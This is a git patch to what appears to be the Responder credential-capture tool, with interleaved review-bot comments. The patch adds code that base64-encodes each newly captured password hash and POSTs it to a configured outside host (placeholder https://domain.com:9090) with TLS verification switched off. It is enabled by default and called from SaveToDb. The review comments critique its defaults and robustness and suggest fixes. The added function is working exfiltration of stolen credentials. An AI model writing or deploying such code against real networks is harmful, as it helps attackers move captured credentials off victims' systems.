From 408e017377153c428e00552111339f004ae08c9c Mon Sep 17 00:00:00 2001
From: deadjakk
Date: Wed, 2 Jun 2021 02:16:36 -0500
Subject: [PATCH] Added HTTPS Exfiltration which sends newly found hsahes as a POST request to the specified URL

---
 Responder.conf | 5 +++++
 settings.py | 17 +++++++++++------
 utils.py | 28 ++++++++++++++++++++++++++++
 3 files changed, 44 insertions(+), 6 deletions(-)

diff --git a/Responder.conf b/Responder.conf
index 5871f68..a56deac 100644
--- a/Responder.conf
+++ b/Responder.conf
@@ -108,3 +108,8 @@ username=sendingaddress@domain.com
 password=passwordtoemail
 port=587
 server=mail.domain.com
+
+[HTTPS Exfiltration]
+enabled=On
+url=https://domain.com:9090
+verifyssl=Off
diff --git a/settings.py b/settings.py
index 84fd987..44ba7e7 100644
--- a/settings.py
+++ b/settings.py
@@ -84,13 +84,18 @@ class Settings:
         config = ConfigParser.ConfigParser()
         config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
 
+        # HTTPS Exfiltration
+        self.httpsexfil_enabled = self.toBool(config.get('HTTPS Exfiltration','enabled'))
+        self.httpsexfil_url = config.get('HTTPS Exfiltration','url')
+        self.httpsexfil_verify = self.toBool(config.get('HTTPS Exfiltration','verifyssl'))
+
         # Email
-        self.emailenabled = self.toBool(config.get('Email', 'enabled'))
-        self.emailserver = config.get('Email', 'server')
-        self.emailport = config.get('Email', 'port')
-        self.emailpassword = config.get('Email', 'password')
-        self.emailusername = config.get('Email', 'username')
-        self.emailsendto = config.get('Email', 'sendtoaddress')
+        self.emailenabled = self.toBool(config.get('Email', 'enabled'))
+        self.emailserver = config.get('Email', 'server')
+        self.emailport = config.get('Email', 'port')
+        self.emailpassword = config.get('Email', 'password')
+        self.emailusername = config.get('Email', 'username')
+        self.emailsendto = config.get('Email', 'sendtoaddress')
 
         # Servers
         self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP'))
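Review bot: The new section ships with `enabled=On` and `verifyssl=Off` against a placeholder URL, so a fresh install whose Responder.conf has not been edited will POST every newly captured hash to `https://domain.com:9090` over a TLS connection whose certificate is never checked. Both defaults should be the safe ones — `enabled=Off` and `verifyssl=On` — so that captured credentials only leave the host after an operator has deliberately pointed the section at an endpoint they control. A one-line comment above the section, `# Off by default: when enabled, every newly captured hash is POSTed to url`, would make the consequence visible where the setting is edited.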
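Review bot: The three new `config.get('HTTPS Exfiltration', ...)` reads raise `NoSectionError` for anyone upgrading with an existing Responder.conf that predates this section, so Responder would fail at startup until the file is hand-edited; guard them with `if config.has_section('HTTPS Exfiltration'):` and default `self.httpsexfil_enabled` to False otherwise, or state in the commit message that the new section is mandatory. `httpsexfil_url` is also accepted unchecked, and since `verifyssl` only matters for TLS, an `http://` value would send captured hashes in plaintext — rejecting a non-`https://` scheme at load time when the feature is enabled would close that gap. The six Email assignments appear to be removed and re-added with identical text, which suggests whitespace-only churn (the collapsed view hides the exact difference); if so, that belongs in a separate commit. The enclosing `Settings` method starts outside the hunk.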
diff --git a/utils.py b/utils.py
index 264dc71..7bf6f91 100644
--- a/utils.py
+++ b/utils.py
@@ -26,6 +26,31 @@ import codecs
 import struct
 from calendar import timegm
 
+def HTTPExfil(result):
+    result = str(result)
+    try:
+        if not settings.Config.httpsexfil_enabled:
+            return
+        # requests isn't in stdlib, so using urllib
+        import urllib.parse
+        import urllib.request
+        import ssl
+        import base64
+        ctx = ssl.create_default_context()
+        if not settings.Config.httpsexfil_verify:
+            ctx.check_hostname = False
+            ctx.verify_mode = ssl.CERT_NONE
+
+        data = {
+            'hashes' : base64.b64encode(result.encode()),
+        }
+        data = bytes( urllib.parse.urlencode( data ).encode() )
+        handler = urllib.request.urlopen( settings.Config.httpsexfil_url, data , context=ctx)
+        print(color("[HTTPS Exfil]",3,1),"Sent via https exfil")
+    except Exception as e:
+        print(color("[HTTPS Exfil]",1),"Error sending via HTTPS Exfil{}".format(e))
+        return
+
 def EmailHash(result):
     import smtplib
     if not settings.Config.emailenabled:
@@ -311,6 +336,9 @@ def SaveToDb(result):
             # Email to desired email address
             EmailHash(str(result))
+
+            # Send via POST to HTTPS server
+            HTTPExfil(result)
         elif len(result['cleartext']):
             print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1))
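Review bot: `urllib.request.urlopen(...)` on the new `handler =` line has no `timeout`, and HTTPExfil is called synchronously from SaveToDb (second hunk), so an unreachable or slow endpoint stalls hash capture indefinitely instead of falling into the except branch; pass a timeout and close the response, e.g. `with urllib.request.urlopen(settings.Config.httpsexfil_url, data, timeout=10, context=ctx) as resp: resp.read()`. As written `handler` is never closed, so each sent hash leaks a connection until garbage collection. `bytes( urllib.parse.urlencode( data ).encode() )` is redundant — `.encode()` already returns bytes. The `urllib.parse`/`urllib.request` imports are Python-3-only; if the project still runs under Python 2, the resulting ImportError is swallowed by the broad `except Exception` and surfaces only as a "Error sending" message on every hash, which is worth either a comment or a version guard. A short comment on the `ctx.verify_mode = ssl.CERT_NONE` line, such as `# verification off: captured hashes go to whoever answers at url`, would make the trade-off explicit to operators who copy the default config.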